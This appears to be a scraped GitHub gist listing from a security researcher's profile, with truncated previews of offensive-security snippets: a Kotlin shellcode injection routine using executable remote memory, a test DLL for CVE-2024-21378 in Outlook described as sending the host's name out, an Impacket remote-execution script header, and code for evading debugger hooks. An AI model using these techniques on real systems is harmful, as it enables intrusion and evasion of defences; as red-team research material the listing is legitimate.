Standard escape codes are prefixed with Escape:
- Ctrl-Key:
^[ - Octal:
\033 - Unicode:
\u001b - Hexadecimal:
\x1B - Decimal:
27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| int main() { | |
| HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ENCRYPTED|FILE_FLAG_DELETE_ON_CLOSE, NULL); | |
| if (!file || file == INVALID_HANDLE_VALUE) { | |
| return GetLastError(); | |
| } | |
| CloseHandle(file); | |
| return 0; | |
| } |
mgeeky
/ EtwStartWebClient.cs
Created
December 5, 2024 14:13
— forked from klezVirus/EtwStartWebClient.cs
A PoC in C# to enable WebClient Programmatically
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.Runtime.InteropServices; | |
| using System; | |
| /* | |
| * Simple C# PoC to enable WebClient Service Programmatically | |
| * Based on the C++ version from @tirannido (James Forshaw) | |
| * Twitter: https://twitter.com/tiraniddo | |
| * URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html | |
| * | |
| * Compile with: |
mgeeky
/ Kotlin Shellcode Injection.kt
Created
December 4, 2024 14:50
— forked from Jire/Kotlin Shellcode Injection.kt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| fun injectShellcode(vararg shellcode: Int) { | |
| val length = shellcode.size | |
| val hProcess = (lms!! as WindowsProcess).handle | |
| val internalBlock = Kernel32.VirtualAllocEx(hProcess, 0, shellcode.size, | |
| WinNT.MEM_COMMIT, WinNT.PAGE_EXECUTE_READWRITE) | |
| val buffer = Memory(shellcode.size.toLong()) | |
| for (i in 0..shellcode.lastIndex) buffer.setByte(i.toLong(), shellcode[i].toByte()) | |
mgeeky
/ atexec_rpc.py
Created
November 29, 2024 23:47
— forked from ThePirateWhoSmellsOfSunflowers/atexec_rpc.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Impacket - Collection of Python classes for working with network protocols. | |
| # | |
| # Copyright Fortra, LLC and its affiliated companies | |
| # | |
| # All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. |
mgeeky
/ test_dll.c
Created
November 26, 2024 16:23
— forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * This DLL is designed for use in conjunction with the Ruler tool for | |
| * security testing related to the CVE-2024-21378 vulnerability, | |
| * specifically targeting MS Outlook. | |
| * | |
| * It can be used with the following command line syntax: | |
| * ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
| * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
| * | |
| * After being loaded into MS Outlook, it sends the PC's hostname and |
mgeeky
/ ExpandDefenderSig.ps1
Created
November 21, 2024 23:37
— forked from dezhub/ExpandDefenderSig.ps1
Decompresses Windows Defender AV signatures for exploration purposes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filter Expand-DefenderAVSignatureDB { | |
| <# | |
| .SYNOPSIS | |
| Decompresses a Windows Defender AV signature database (.VDM file). | |
| .DESCRIPTION | |
| Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed. |
mgeeky
/ binding.gyp
Created
November 21, 2024 20:55
— forked from NickNaso/binding.gyp
N-API register module (the new way)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "targets": [ | |
| { | |
| "target_name": "hello", | |
| "sources": [ "hello.cc" ] | |
| } | |
| ] | |
| } |
mgeeky
/ AddVectoredExceptionHandler.cpp
Created
October 22, 2024 22:16
Rebuilt RtlAddVectoredExceptionHandler so that it doesn't use the ntdll imported function. This way it would be more difficult than just putting a breakpoint on RtlAddVectoredExceptionHandler to log your function. To make it a little better you could inline EncodePointer which would only a few extra lines. Structs might be documented somewhere h…
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <winternl.h> | |
| // Types | |
| using LdrProtectMrdata_t = void(__stdcall*)(int); | |
| using LdrProtectMrdataHeap_t = void(__thiscall*)(int); | |
| struct ExceptionRecord_t { | |
| LIST_ENTRY entry; | |
| int* unknown_intptr; |
mgeeky
/ ldrloaddll_hook.c
Created
October 20, 2024 10:39
— forked from bats3c/ldrloaddll_hook.c
Hook LdrLoadDll to whitelist DLLs being loaded into a process
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <winternl.h> | |
| #define dwAllowDllCount 1 | |
| CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = { | |
| "W:\\allowed.dll" | |
| }; | |
| VOID HookLoadDll(LPVOID lpAddr); |